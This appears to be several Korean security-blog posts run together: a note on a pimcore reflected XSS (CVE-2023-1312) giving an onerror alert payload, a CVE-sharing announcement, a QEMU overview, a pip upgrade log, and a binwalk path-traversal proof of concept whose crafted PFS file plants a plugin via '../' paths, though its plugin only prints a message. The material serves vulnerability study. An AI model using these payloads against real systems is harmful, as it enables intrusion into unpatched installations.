ref

• https://cve.report/CVE-2023-1312
• https://huntr.dev/bounties/2a64a32d-b1cc-4def-91da-18040d59f356/

배경

• github 내의 Reflected 환경에서의 Cross-site Scripting 취약점 발견
• 해당 취약점은 pimcore v10.5.19 이하 버전에서 발견

분석

• pimcore는 Application Logger 모듈 검색할 때 From 및 To 필드에서 Reflected XSS에 취약
• 테스트
  • https://demo.pimcore.fun/admin/ 접속
  • Tools → Application Logger
  • Search 란에 Payload 아래 Payload 입력

"><img src=x onerror=alert(document.domain);>

패치 방법

• 업데이트
  • v10.5.19 보다 높은 버전으로 업데이트 진행 필요

안녕하세요. crattack입니다.

제가 가볍게 취약점 분석을 하려고 준비하고 있는 것 중에 하나를 공유하려고 합니다.

1. 목적

많은 CVE가 나오고 있습니다. 그 중에 어떤 것들을 봐야할지 어떤 것들이 중요한지를 분류하기란 쉽지 않습니다.

따라서, 저는 앞으로 T(Today)-1 기준으로 다음의 분류 항목에 맞게 CVE와 CVE URL을 제공하려고 합니다.

관심 있는 분들은 이 곳에서 참고하시어 연구하시는데 도움이 되셨으면 합니다.

2. 공유 양식

[Date] [분류 (Remote Attack, SQL Injection, XSS, Command Injection, Github, Docker, 등등)] [CVE No.] [CVE URL]

추가적인 정보를 원하시면 의견을 주세요.

3. 마치며

앞으로 더 좋은 것들을 공유 하도록 노력 하겠습니다.

감사합니다.

QEMU란?

QEMU는 가상화 소프트웨어이며, 사용자가 다양한 아키텍처에서 가상머신을 실행할 수 있도록 지원합니다. 이 소프트웨어는 무료이며, 다양한 운영체제에서 동작합니다. QEMU는 또한 하드웨어 가속 기술을 지원하며, 특히 KVM(Kernel Virtual Machine)과 결합하여 가상화를 향상시킬 수 있습니다.

QEMU의 기능

QEMU는 다음과 같은 기능을 제공합니다.

• 가상머신 생성 및 실행
• 다양한 아키텍처에서의 가상머신 지원
• 하드웨어 가속 기술 지원
• 다양한 운영체제에서 동작
• GUI 및 CLI 인터페이스 제공

QEMU의 사용

QEMU는 가상머신을 생성하고 실행하는 데 사용됩니다. QEMU를 사용하여 가상머신을 생성하고 실행하려면, 다음과 같은 단계를 따르면 됩니다.

1. QEMU를 설치합니다.
2. QEMU를 사용하여 가상머신을 생성합니다.
3. 생성한 가상머신에서 운영체제를 설치합니다.
4. 생성한 가상머신을 실행합니다.

QEMU는 CLI(Command-Line Interface)를 통해 사용할 수 있으며, 다음과 같은 명령어를 사용하여 가상머신을 생성하고 실행할 수 있습니다.

qemu-system-{arch} [options] [disk_image]

여기서 {arch}는 생성하려는 가상머신의 아키텍처를 나타냅니다. 예를 들어, x86 아키텍처의 가상머신을 생성하려면 qemu-system-x86_64 명령어를 사용합니다.

QEMU의 장단점

장점

• 다양한 아키텍처에서의 가상머신 지원
• 하드웨어 가속 기술 지원
• 다양한 운영체제에서 동작

단점

• 성능이 상대적으로 느림
• GUI 인터페이스가 다소 불편함

결론

QEMU는 무료이며, 다양한 아키텍처에서 가상머신을 실행할 수 있는 가상화 소프트웨어입니다. 하드웨어 가속 기술을 지원하여 가상화를 향상시킬 수 있으며, 다양한 운영체제에서 동작합니다. 그러나 성능이 상대적으로 느리고 GUI 인터페이스가 다소 불편하다는 단점이 있습니다.

 

사용해 본 결과

- 동향 및 간략한 정리용 보고서를 사용하는데 아주 좋다.

- 아직은 심도 있는 코드쪽은 사용해보지 못했지만, 여러 정황으로 볼때 퀄리티는 나쁘지 않을 것으로 예상된다.

- 취약점 점검도 가능한지는 도전해보고 싶다는 의욕이 생겼다.

- 다음에는 동영상 편집쪽으로 테스트 해볼 계획이다.

- 앞으로 먹고 살기 힘들구만...ㅜㅜ

babyhack@ubuntu:~/tmp$ sudo pip3 install pip --upgrade
Traceback (most recent call last):
  File "/usr/bin/pip3", line 11, in <module>
    sys.exit(main())
  File "/usr/local/lib/python3.5/dist-packages/pip/__init__.py", line 11, in main
    from pip._internal.utils.entrypoints import _wrapper
  File "/usr/local/lib/python3.5/dist-packages/pip/_internal/utils/entrypoints.py", line 12
    f"pip{sys.version_info.major}",
                                 ^
SyntaxError: invalid syntax
babyhack@ubuntu:~/tmp$ wget https://bootstrap.pypa.io/pip/3.5/get-pip.py
--2023-02-10 00:21:55--  https://bootstrap.pypa.io/pip/3.5/get-pip.py
Resolving bootstrap.pypa.io (bootstrap.pypa.io)... 151.101.0.175, 151.101.64.175, 151.101.128.175, ...
Connecting to bootstrap.pypa.io (bootstrap.pypa.io)|151.101.0.175|:443... connected.
HTTP request sent, awaiting response...
200 OK
Length: 1908223 (1.8M) [text/x-python]
Saving to: ‘get-pip.py’

get-pip.py                           100%[===================================================================>]   1.82M  6.01MB/s    in 0.3s

2023-02-10 00:21:55 (6.01 MB/s) - ‘get-pip.py’ saved [1908223/1908223]

babyhack@ubuntu:~/tmp$ python3 get-pip.py
DEPRECATION: Python 3.5 reached the end of its life on September 13th, 2020. Please upgrade your Python as Python 3.5 is no longer maintained. pip 21.0 will drop support for Python 3.5 in January 2021. pip 21.0 will remove support for this functionality.
Defaulting to user installation because normal site-packages is not writeable
Collecting pip<21.0
  Downloading pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
     |████████████████████████████████| 1.5 MB 7.7 MB/s
Installing collected packages: pip
Successfully installed pip-20.3.4
babyhack@ubuntu:~/tmp$ sudo pip3 install pip --upgrade
WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see https://github.com/pypa/pip/issues/5599 for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
DEPRECATION: Python 3.5 reached the end of its life on September 13th, 2020. Please upgrade your Python as Python 3.5 is no longer maintained. pip 21.0 will drop support for Python 3.5 in January 2021. pip 21.0 will remove support for this functionality.
WARNING: The directory '/home/babyhack/.cache/pip' or its parent directory is not owned or is not writable by the current user. The cache has been disabled. Check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Requirement already satisfied: pip in /home/babyhack/.local/lib/python3.5/site-packages (20.3.4)
Collecting pip
  Downloading pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
     |████████████████████████████████| 1.5 MB 5.8 MB/s
  Downloading pip-20.3.3-py2.py3-none-any.whl (1.5 MB)
     |████████████████████████████████| 1.5 MB 9.4 MB/s
babyhack@ubuntu:~/tmp$

명령어

• wget https://bootstrap.pypa.io/pip/3.5/get-pip.py
• python3 get-pip.py
• sudo pip3 install pip --upgrade

설명

버전 2.1.2b ~ 2.3.2 까지의 ReFirm Labs binwalk에서 경로 탐색 취약점이 확인 되었다.

이 취약점을 통해 원격 공격자는 영향을 받는 binwalk 설치에서 임의 코드를 실행 할 수 있다.

“-e : 대상이 추출 모드(옵션)를 사용하여, binwalk로 악성 파일을 열어야 한다.”는 점에서 이 취약점을 악용하려면 사용자 상호 작용이 필요합니다 .

테스트 환경

• MacOS Ventura 3.1
• Homebrew로 설치한 Binwalk v2.3.3

테스트 과정

1. binwalk -e -M poc.zip

babyhack@MacBookPro> binwalk -e -M poc.zip

Scan Time:     2023-02-01 20:30:54
Target File:   /Users/babyhack/Downloads/poc.zip
MD5 Checksum:  4fdad30c7c1b4915938b5ad2786f5bf8
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, compressed size: 170, uncompressed size: 349, name: malicious.pfs
324           0x144           End of Zip archive, footer length: 22

Scan Time:     2023-02-01 20:30:54
Target File:   /Users/babyhack/Downloads/_poc.zip.extracted/malicious.pfs
MD5 Checksum:  9a12bccad3db3ed8b818a31846d5976f
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PFS filesystem, version 0.9, 1 files

malicious.pfs 파일 내용

babyhack@MacBookPro> xxd malicious.pfs
00000000: 5046 532f 302e 3900 0000 0000 0000 0100  PFS/0.9.........
00000010: 2e2e 2f2e 2e2f 2e2e 2f2e 636f 6e66 6967  ../../../.config
00000020: 2f62 696e 7761 6c6b 2f70 6c75 6769 6e73  /binwalk/plugins
00000030: 2f6d 616c 7761 6c6b 2e70 7900 0000 0000  /malwalk.py.....
00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000090: 3412 0000 a000 0000 c100 0000 696d 706f  4...........impo
000000a0: 7274 2062 696e 7761 6c6b 2e63 6f72 652e  rt binwalk.core.
000000b0: 706c 7567 696e 0a0a 636c 6173 7320 4d61  plugin..class Ma
000000c0: 6c69 6369 6f75 7345 7874 7261 6374 6f72  liciousExtractor
000000d0: 2862 696e 7761 6c6b 2e63 6f72 652e 706c  (binwalk.core.pl
000000e0: 7567 696e 2e50 6c75 6769 6e29 3a0a 2020  ugin.Plugin):.
000000f0: 2020 2222 220a 2020 2020 4d61 6c69 6369    """.    Malici
00000100: 6f75 7320 6269 6e77 616c 6b20 706c 7567  ous binwalk plug
00000110: 696e 0a20 2020 2022 2222 0a0a 2020 2020  in.    """..
00000120: 6465 6620 696e 6974 2873 656c 6629 3a0a  def init(self):.
00000130: 2020 2020 2020 2020 7072 696e 7428 2268          print("h
00000140: 656c 6c6f 2066 726f 6d20 6d61 6c69 6369  ello from malici
00000150: 6f75 7320 706c 7567 696e 2229 0a         ous plugin").

import binwalk.core.plugin

class MaliciousExtractor(binwalk.core.plugin.Plugin):
"""    Malicious binwalk plugin.    """
	def init(self):
		print("hello from malicious plugin")

결과

• binwalk.core.plugin 파일을 참조할 수 없어 제대로 실행 되지 않음.
• 버전이 맞지 않아서 제대로 실행되지 않을 가능성도 있음.

ref.

• https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk